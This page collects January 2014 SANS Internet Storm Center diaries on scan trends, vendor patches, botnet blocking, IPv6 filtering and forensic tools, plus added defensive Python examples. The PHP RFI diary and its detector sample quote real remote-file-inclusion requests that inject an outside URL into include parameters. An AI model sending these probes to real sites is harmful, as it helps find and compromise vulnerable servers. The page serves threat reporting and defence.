Latest Alerts

ISC StormCast for Friday, January 17th 2014 http://isc.sans.edu/podcastdetail.html?id=3785, (Fri, Jan 17th)

Thu, 01/16/2014 - 20:30
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Port 4028 - Interesting Activity, (Thu, Jan 16th)

Wed, 01/15/2014 - 18:06

Take a look at port 4028. Thanks to Bill for sharing an analysis that concluded a piece of malware was an Aidra botnet client. His shared analysis asks for a deeper look at port 4028. I found a published write-up from Symantec. [1]

After looking at our port 4028 data [2], there is reason to watch for it. Please chime in if you are seeing any traffic on port 4028.

# portascii.html
# Start Date: 2013-12-01
# End Date: 2014-01-15
# Port: 4028
# created: Thu, 16 Jan 2014 01:34:07 +0000
# Date in GMT. YYYY-MM-DD format.
date        records  targets  sources  tcpratio
2013-12-01  19       2        2        100
2013-12-04  18       2        2        100
2013-12-05  28       4        6        100
2013-12-06  8        2        2        100
2013-12-07  13       5        7        85
2013-12-08  9        5        7        67
2013-12-09  13       3        4        100
2013-12-10  23       5        6        100
2013-12-11  5        3        5        80
2013-12-12  19       3        3        100
2013-12-23  4        2        3        100
2013-12-25  6        2        3        100
2014-01-04  49240    45589    3        100
2014-01-05  1559     1440     40       100
2014-01-08  28910    26975    4        100
2014-01-09  6        6        3        83
2014-01-10  4531     3675     4        100
2014-01-11  76271    72307    3        100
2014-01-13  239      173      3        100
2014-01-14  195      164      6        99
2014-01-15  10       5        2        90
# (c) SANS Inst. / DShield. some rights reserved.
# Creative Commons ShareAlike License 2.5
# http://creativecommons.org/licenses/by-nc-sa/2.5/

 

[1] http://www.symantec.com/security_response/writeup.jsp?docid=2013-121118-5758-99
[2]  https://isc.sans.edu/port.html?&startdate=2013-12-17&enddate=2014-01-16&port=4028&yname=sources&y2name=targets
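
One way to pick the unusual days out of the port 4028 report above, added here as an example (it is not ISC or DShield code): parse the report rows and flag days whose target count is far above the median. The function names and the 20x-median threshold are assumptions made for this example.

```python
import statistics

# Rows copied from the port 4028 report quoted in the diary
# (columns: date records targets sources tcpratio).
PORTASCII = """\
# Port: 4028
date records targets sources tcpratio
2013-12-01 19 2 2 100
2013-12-04 18 2 2 100
2013-12-05 28 4 6 100
2013-12-06 8 2 2 100
2013-12-07 13 5 7 85
2013-12-08 9 5 7 67
2013-12-09 13 3 4 100
2013-12-10 23 5 6 100
2013-12-11 5 3 5 80
2013-12-12 19 3 3 100
2013-12-23 4 2 3 100
2013-12-25 6 2 3 100
2014-01-04 49240 45589 3 100
2014-01-05 1559 1440 40 100
2014-01-08 28910 26975 4 100
2014-01-09 6 6 3 83
2014-01-10 4531 3675 4 100
2014-01-11 76271 72307 3 100
2014-01-13 239 173 3 100
2014-01-14 195 164 6 99
2014-01-15 10 5 2 90
"""

FIELDS = ("records", "targets", "sources", "tcpratio")


def parse_portascii(text):
    """Return one dict per data row, skipping '#' comments and the header."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0].startswith("#") or parts[0] == "date":
            continue
        row = {"date": parts[0]}
        row.update(zip(FIELDS, map(int, parts[1:])))
        rows.append(row)
    return rows


def find_spikes(rows, factor=20):
    """Flag days whose target count is at least `factor` times the median.

    The median is the baseline because a few extreme days would pull a mean
    upward and hide the very spikes being looked for. `factor` is an assumed
    threshold, not a DShield value.
    """
    baseline = statistics.median(r["targets"] for r in rows)
    spikes = []
    for r in rows:
        if r["targets"] >= factor * baseline:
            spikes.append({
                "date": r["date"],
                "targets": r["targets"],
                "sources": r["sources"],
                # Many targets per source means a few hosts sweeping widely.
                "targets_per_source": round(r["targets"] / max(r["sources"], 1)),
            })
    return baseline, spikes


if __name__ == "__main__":
    baseline, spikes = find_spikes(parse_portascii(PORTASCII))
    print(f"median targets per day: {baseline}")
    for s in spikes:
        print(s["date"], s["targets"], "targets from", s["sources"], "sources")
```

On the busiest days the number of sources stays in the single digits while the number of targets climbs into the tens of thousands, which is the pattern of a few hosts sweeping large address ranges.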

 

 


ISC StormCast for Thursday, January 16th 2014 http://isc.sans.edu/podcastdetail.html?id=3782, (Thu, Jan 16th)

Wed, 01/15/2014 - 17:13

ISC StormCast for Wednesday, January 15th 2014 http://isc.sans.edu/podcastdetail.html?id=3779, (Wed, Jan 15th)

Tue, 01/14/2014 - 17:49

Oracle Critical Patch Update January 2014, (Tue, Jan 14th)

Tue, 01/14/2014 - 17:40

Today we also got Oracle's quarterly "Critical Patch Update". As announced, we got a gross or 144 different patches from Oracle. But remember that these patches affect 47 different products (if I counted right).

The product we are overall most worried about is Java. With this CPU, 34 security vulnerabilities are fixed in Java SE. So again: Patch or disable (fast).

http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter


Adobe Patch Tuesday January 2014, (Tue, Jan 14th)

Tue, 01/14/2014 - 13:04

 Adobe released two bulletins today:

1 - Reader/Acrobat

This bulletin fixes three vulnerabilities. Adobe rates this one "Priority 1" meaning that these vulnerabilities are already exploited in targeted attacks and administrators should patch ASAP.

After the patch is applied, you should be running Acrobat/Reader 11.0.06 or 10.1.9.

2 - Flash Player and Air

The Flash Player patch fixes two vulnerabilities. The Flash Player problem is rated "Priority 1" for Windows and OS X. The Air vulnerability is rated "3" for all operating systems. For Linux, either patch is rated "3".

Patching Flash is a bit more complex in that it is included with some browsers, in which case you will need to update the browser. For example, Internet Explorer 11 and Chrome include Flash.

 

http://helpx.adobe.com/security/products/flash-player/apsb14-01.html
http://helpx.adobe.com/security/products/flash-player/apsb14-02.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter


Microsoft Patch Tuesday January 2014, (Tue, Jan 14th)

Tue, 01/14/2014 - 10:03

Overview of the January 2014 Microsoft patches and their status.

 

Columns: # / Affected / Contra Indications - KB / Known Exploits / Microsoft rating(**) / ISC rating(*) for clients and servers

MS14-001 Code Remote Execution Vulnerability in Microsoft Word and Office Web apps (Replaces MS13-072 MS13-084 MS13-086 MS13-100)
  • Affected: Word and SharePoint / Office Web Apps components related to Word Docs. CVE-2014-0258 CVE-2014-0259 CVE-2014-0260 CVE-2014-0260
  • Contra Indications - KB: KB 2916605
  • Known Exploits: No.
  • Microsoft rating(**): Severity: Important, Exploitability: 1
  • ISC rating(*): clients Critical, servers Critical

MS14-002 Privilege Escalation Vulnerabilities in Windows Kernel (Replaces MS10-099)
  • Affected: NDPROXY driver. CVE-2013-5065
  • Contra Indications - KB: KB 2914368
  • Known Exploits: publicly disclosed and used in targeted attacks.
  • Microsoft rating(**): Severity: Important, Exploitability: 1
  • ISC rating(*): clients Important, servers Important

MS14-003 Elevation of Privilege Vulnerability in Windows Kernel Mode Drivers (Replaces MS13-101)
  • Affected: win32k.sys Kernel Mode Driver. CVE-2014-0262
  • Contra Indications - KB: KB 2913602
  • Known Exploits: No.
  • Microsoft rating(**): Severity: Important, Exploitability: 1
  • ISC rating(*): clients Important, servers Important

MS14-004 Denial of Service Vulnerability in Microsoft Dynamics AX (Replaces )
  • Affected: Microsoft Dynamics AX. CVE-2014-0261
  • Contra Indications - KB: KB 2880826
  • Known Exploits: No.
  • Microsoft rating(**): Severity: Important, Exploitability: 1
  • ISC rating(*): clients N/A, servers Important

We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

 


Spamming and scanning botnets - is there something I can do to block them from my site?, (Tue, Jan 14th)

Tue, 01/14/2014 - 04:12
Spamming and scanning botnets - is there something I can do to block them from my site?

This question keeps popping up on forums and all places popular with those beleaguered souls despondent over the random spamming and overfilled logs from scanning. Although this isn't a Magic ball question, the answer does come out as: Maybe, maybe not.

The reason behind the ambiguity is logical, to a degree: it's easier to hinder, frustrate and reduce the effectiveness of automated botnet processes, like posting and scanning, than to stop them dead.

Why? Glad you asked.

Botnets tend to be a number of systems located in random locations globally. You'll get some that are region-specific, but the majority we at the Internet Storm Center (ISC) see are global in distribution. So unless you can pick out only the six IP addresses you completely trust as good*, you're accessible to every system on the planet that has an internet link.

First and foremost, you need to look at your logs and find those non-human attacks or blog spamming posts. We keep saying here at the ISC that you need to understand your logs. If you don't understand what you're seeing, research it or write in to us. It doesn't take too long to be able to tell a real human interaction from an automated non-human one. Have a look at one of our recent posts [1] to see the types of patterns automated processes leave behind in logs.

Let's say you are now at one with your log files, so what next? From a random reader's submission of the bots they logged, I did a little Excel shuffling, then some IP geolocation followed by more Excel-ing, finally breaking the IP addresses down by the country they came from. The results were interesting, as Spain has the highest set of bad IPs (13%), followed by: Argentina (9%), Italy (8%), Colombia (5%), United States (5%), United Kingdom (4%), Mexico (4%), Romania (4%) and Germany (4%).

So what can we divine from these random statistics? First, we can acknowledge that this botnet has a significant portion of its bots in Europe; second, the next biggest group is in South America, leaving the United States well out of the picture. Yeah, so what, I hear you yell. Now go back and look at the locations your human visitors came from. With a simple bit of review, you'll be able to work out that you never see visitors from, say, South America and New Zealand IP address ranges.

Now you can make the determination to black list (deny) net blocks in those countries from ever being able to access your web site or blog. On the flip side, you could block everything and white list (allow) certain countries. Or go crazy and play whack-a-mole by adding every single bad IP address to a block list. It's up to you.

The point of this piece is: look at your logs, understand your visitors, work out who actually needs to get to your site, and block out the rest if the now constant automated scans annoy you.

Remember DShield loves logs [2] and Handlers love weird logs and packets, so start off your New Year by looking at your logs and sending in anything wild, crazy or that just seems plain odd to us at the Storm Center [3]. You'll learn something new and might help someone who's been puzzling over the same questions you're looking at now.

[1] https://isc.sans.edu/diary/Massive+PHP+RFI+scans/17387
[2] https://isc.sans.edu/howto.html
[3] https://isc.sans.edu/contact.html#contact-form

* This kind of breaks the Internet model and takes us back to the good ol' days of having a host file to resolve stuff on the 'Net

Chris Mohan --- Internet Storm Center Handler on Duty
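
The comparison described in this diary (where do the bots come from, where do real visitors come from, and what can be denied without hurting anyone), sketched as an added example that is not part of the original post. It works per netblock rather than per country because no geolocation database is assumed; the addresses are constructed from documentation ranges, and the /28 block size, the `min_bots` threshold and the function names are assumptions.

```python
import ipaddress
from collections import Counter

# Constructed sample data (RFC 5737 documentation ranges, IPv4 only).
BOT_IPS = [
    "192.0.2.3", "192.0.2.9",          # two bots in 192.0.2.0/28
    "192.0.2.18", "192.0.2.20",        # two bots in the adjacent /28
    "203.0.113.70", "203.0.113.75",    # two bots in 203.0.113.64/28
    "198.51.100.34", "198.51.100.40",  # bots sharing a block with a human
    "203.0.113.200",                   # a lone bot
]
HUMAN_IPS = ["198.51.100.35", "198.51.100.130", "203.0.113.5"]


def block_of(ip, prefix):
    """Netblock of the given prefix length that contains `ip`."""
    return ipaddress.ip_network(f"{ip}/{prefix}", strict=False)


def build_deny_list(bot_ips, human_ips, prefix=28, min_bots=2):
    """Split bot sources into blocks to deny, blocks to review, and singles.

    deny_blocks:   blocks with several bots and no known human visitor,
                   merged into the smallest set of CIDR ranges.
    review_blocks: blocks where bots and real visitors overlap; denying
                   these would lock out people who use the site.
    deny_single:   lone bot addresses, the whack-a-mole case.
    """
    bots = sorted(set(bot_ips), key=ipaddress.ip_address)
    bot_blocks = Counter(block_of(ip, prefix) for ip in bots)
    human_blocks = {block_of(ip, prefix) for ip in human_ips}

    deny, review, single = [], [], []
    for block, count in bot_blocks.items():
        if block in human_blocks:
            review.append(block)
        elif count >= min_bots:
            deny.append(block)
        else:
            single.extend(ip for ip in bots
                          if ipaddress.ip_address(ip) in block)

    return {
        # collapse_addresses merges adjacent blocks, e.g. two /28s into a /27.
        "deny_blocks": [str(n) for n in ipaddress.collapse_addresses(deny)],
        "review_blocks": [str(n) for n in sorted(review)],
        "deny_single": single,
    }


if __name__ == "__main__":
    for name, entries in build_deny_list(BOT_IPS, HUMAN_IPS).items():
        print(name, entries)
```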


ISC StormCast for Tuesday, January 14th 2014 http://isc.sans.edu/podcastdetail.html?id=3776, (Tue, Jan 14th)

Mon, 01/13/2014 - 16:40

Special Webcast today: HTML5, Risky Business or Hidden Security Toolchest? https://www.sans.org/webcasts/html5-risky-business-hidden-security-tool-chest-mobile-web-app-authentication-97650, (Mon, Jan 13th)

Mon, 01/13/2014 - 05:54

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter


Got an IPv6 Firewall?, (Mon, Jan 13th)

Mon, 01/13/2014 - 05:43

Just like the call "Winter is Coming" in Game of Thrones, we keep hearing IPv6 is coming to our networks spreading doom and gloom to our most prized assets. But just like the clothing worn by some of the actors of the TV show isn't exactly suited for winter, the network security infrastructure deployed currently wouldn't give you a hint that IPv6 is around the corner.

On the other hand, here are some recent numbers:

  • Over 25% of Comcast customers are "actively provisioned with native dual stack broadband" (see comcast6.net)
  • 40% of the Verizon Wireless network is using IPv6 as of December 2013 (http://www.worldipv6launch.org/measurements/)
  • Between July and December last year, Akamai saw IPv6 traffic go up by about a factor of 5 (http://www.akamai.com/ipv6)

When I made our new "Quickscan" router scanning tool available last week, I left it IPv6 enabled. So it is no surprise, that I am getting e-mails like the following:

The results were "interesting"
...
A few weeks ago I had installed an IPv6 capable modem and updated my router config to enable IPv6. The results were glorious in that IPv6 ran like a charm.
The sober facts arose when I ran the ISC router scan - it used my IPv6 address, which hooked directly to my desktop (behind my firewall) and pulled up my generally unused native Apache service. 
I went over my router config with a fine-tooth comb and realized that my router has no support for IPv6 filtering.

So does your firewall filter IPv6? Or just "use it"? Do you have sufficient host based controls in place? You don't necessarily have to assign globally routable IPv6 addresses. You could use proxies to terminate "global" IPv6 and only use ULA addresses internally. But in particular home users are unlikely to go that route.

(I am working on making the "quickscan" tool (https://isc.sans.edu/quickscan.html [login required]) more generic. For now it only scans common router admin and backdoor ports)

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

IPv6 Security Training ( https://www.sans.org/sec546 )
Twitter


ISC StormCast for Monday, January 13th 2014 http://isc.sans.edu/podcastdetail.html?id=3773, (Mon, Jan 13th)

Sun, 01/12/2014 - 17:36

Notification Glitch - Multiple New Diary Notifications, (Sun, Jan 12th)

Sun, 01/12/2014 - 08:45

We have been notified that some of you have received repeated notifications being sent out regarding a recently-published diary. Notification has been turned off while we are investigating the issue. We apologize about the inconvenience.

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Windows Autorun-3, (Fri, Jan 10th)

Sat, 01/11/2014 - 21:33

In previous diaries I talked about some of the most common startup locations in a Windows environment.

In this diary I will talk about some of the methods to enumerate these values from the registry.

1-Autoruns

Sysinternals Autoruns is the best tool available to enumerate the startup locations; it can locate almost every startup location in Windows. If you are a big fan of the command line or you need something scriptable, Autorunsc is the command line version of Autoruns. Autoruns can detect the startup locations for the current user and any other user using the same system.

In addition, one of the most powerful features of Autoruns is the ability to analyze offline systems. This will be very useful if you have a binary image of a compromised system.

Here is how to use it with an offline system:

1-Mount the image

2-File->Analyze Offline System..

3-Provide System Root and User Profile Path

4-Click OK

2-Registry Editors/Viewers

In the forensics world we cannot depend on one tool only; in many cases we have to double-check the result of one tool using a different tool.

In addition to the Windows built-in tools (RegEdit, reg command and PowerShell Get-ChildItem/Get-ItemProperty) there are some great tools to analyze the registry, such as AccessData FTK Registry Viewer, Harlan Carvey's RegRipper and TZWorks Yet Another Registry Utility (yaru).

One big advantage of yaru is the ability to recover deleted registry keys, which is very useful when someone is trying to hide their tracks.



3-WMIC

Windows Management Instrumentation Command-line (WMIC) has its own way to retrieve the startup locations.

Wmic startup list full


 


tcpflow 1.4.4 and some of its most Interesting Features, (Sat, Jan 11th)

Sat, 01/11/2014 - 14:43

The latest version can of course reconstruct TCP flows but also has some interesting features, such as being able to carve files out of web traffic (zip, gif, jpg, css, etc.) and reconstruct webpages. Another nice feature is that it provides a summary PDF report of the pcap file processed by tcpflow.

When file reconstruction is enabled, the files carved from web traffic are named in a format that differentiates them from the regular reconstructed TCP flow files. Their names end with HTTPBODY-001.html, HTTPBODY-001.gif, HTTPBODY-001.css or HTTPBODY-001.zip, to name a few.

A precompiled 32 and 64 bit version 1.4.0b1 is available for download here and contains all the same functionality as the Unix version, which can be downloaded here. This basic setup replays a pcap file and enables all the features used in tcpflow:

tcpflow -a -o tcpflow -r daemonlogger.pcap

-a: do ALL post-processing
-r file: read packets from tcpdump pcap file (may be repeated)
-o  outdir   : specify output directory (default '.')

[1] http://www.circlemud.org/jelson/software/tcpflow/
[2] https://github.com/simsong/tcpflow
[3] http://www.digitalcorpora.org/downloads/tcpflow/

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Massive PHP RFI scans, (Thu, Jan 9th)

Sat, 01/11/2014 - 03:02
Today one of our readers, Yinette, sent in a pcap of pretty massive PHP RFI scans. Yinette has been seeing this for quite some time and the number of requests sent by this (yet unknown) bot or botnet kept rising. Judging by the source IP address the bots appear to be running on compromised web servers with typical CPanel installations and large numbers of hosted virtual servers.

The scanning requests are relatively fast and in the capture Yinette made the bot constantly sent at least 2 requests per second. All requests try to exploit a RFI vulnerability (I haven’t checked yet to see if all of them are well known, but a cursory inspection says most of them are well known) and the file included is the humans.txt static file on Google (http://www.google.com/humans.txt).

The bot almost certainly parses the output and if it sees contents of the humans.txt file it knows that the site has a RFI (Remote File Inclusion) vulnerability. Google’s availability and uptime help of course.

Some observed requests are shown below:

GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0
GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0
GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0
GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0
GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0
GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0
GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0
GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0
GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0
GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0

This is only a small part of all the requests the bot sends. In total, on Yinette’s web site it sent 804 requests (that’s 804 vulnerabilities it’s trying to exploit)! This indeed might be someone trying to build a big(ger) botnet.

Are you seeing same/similar requests on your web site too? Or maybe you managed to catch the bot on a compromised machine or a honeypot? Let us know!

UPDATE:

We received a lot of submissions regarding this – thanks to everyone that sent their logs/observations in! After analyzing the logs we received, it appears that these scans started around the 21st of December 2013 and they are still going on.

Also, the capture Yinette did appears to have captured only a part of the attack. We received several submissions showing exact requests (that fortunately resulted in 404 errors :) for most of them).

The total number of requests done is even higher – the bot tries to access 2217 (!!!) URIs. Every URI accessed is a RFI vulnerability and they always (at least in these attacks) try to retrieve the humans.txt file from Google (it would be interesting if someone at Google could analyze their logs of requests for this file).

So, this is getting pretty large. Unfortunately we haven’t seen the bot’s code so far – if you do manage to catch it please upload it through our contact form so we can analyze it.

--
Bojan
@bojanz
INFIGO IS
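
A way to find this scan in your own web server logs, added here as an example (it is not the handler's or the reader's tooling): it looks for query parameters whose value is itself an absolute URL, then groups the hits per client. The request URIs in the sample come from the diary; the client addresses, timestamps, status codes, the `min_paths` threshold and the function name are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl

# Common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is an absolute URL; group 1 is the remote host.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://([^/?#]+)', re.IGNORECASE)

# Constructed sample log (documentation addresses, made-up times/statuses).
SAMPLE_LOG = """\
192.0.2.10 - - [09/Jan/2014:10:15:01 +0000] "GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0" 404 209
192.0.2.10 - - [09/Jan/2014:10:15:01 +0000] "GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0" 404 209
198.51.100.7 - - [09/Jan/2014:10:15:02 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120
192.0.2.10 - - [09/Jan/2014:10:15:02 +0000] "GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0" 404 209
192.0.2.10 - - [09/Jan/2014:10:15:02 +0000] "GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0" 404 209
192.0.2.10 - - [09/Jan/2014:10:15:03 +0000] "GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0" 404 209
192.0.2.10 - - [09/Jan/2014:10:15:03 +0000] "GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0" 200 1843
203.0.113.5 - - [09/Jan/2014:10:16:40 +0000] "GET /share.php?url=http://example.com/article HTTP/1.1" 200 733
""".splitlines()


def find_rfi_scanners(lines, min_paths=3):
    """Report clients that probe several scripts with URL-valued parameters."""
    clients = defaultdict(lambda: {"paths": set(), "hosts": set(),
                                   "times": [], "answered_200": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["uri"].partition("?")
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too.
        hosts = set()
        for _, value in parse_qsl(query, keep_blank_values=True):
            hit = REMOTE_RE.match(value)
            if hit:
                hosts.add(hit.group(1).lower())
        if not hosts:
            continue
        rec = clients[m["ip"]]
        rec["paths"].add(path)
        rec["hosts"] |= hosts
        rec["times"].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
        if m["status"] == "200":
            # Not proof of a vulnerable script, but the path exists: review it.
            rec["answered_200"].append(path)

    report = {}
    for ip, rec in clients.items():
        # One URL-valued parameter can be a legitimate share or redirect
        # link; the same client trying many different scripts is a scan.
        if len(rec["paths"]) < min_paths:
            continue
        seconds = (max(rec["times"]) - min(rec["times"])).total_seconds() + 1
        report[ip] = {
            "probes": len(rec["times"]),
            "distinct_paths": len(rec["paths"]),
            "include_hosts": sorted(rec["hosts"]),
            "per_second": round(len(rec["times"]) / seconds, 2),
            "answered_200": rec["answered_200"],
        }
    return report


if __name__ == "__main__":
    for ip, info in find_rfi_scanners(SAMPLE_LOG).items():
        print(ip, info)
```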


PHP 5.4.24 & 5.5.8 Released - http://www.php.net/downloads.php & http://windows.php.net/download/, (Sat, Jan 11th)

Fri, 01/10/2014 - 17:30

----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Adobe joins the show on Tuesday too and announces patches for Adobe Reader and Acrobat: http://helpx.adobe.com/security/products/acrobat/apsb14-01.html, (Fri, Jan 10th)

Fri, 01/10/2014 - 13:11

-- Bojan INFIGO IS
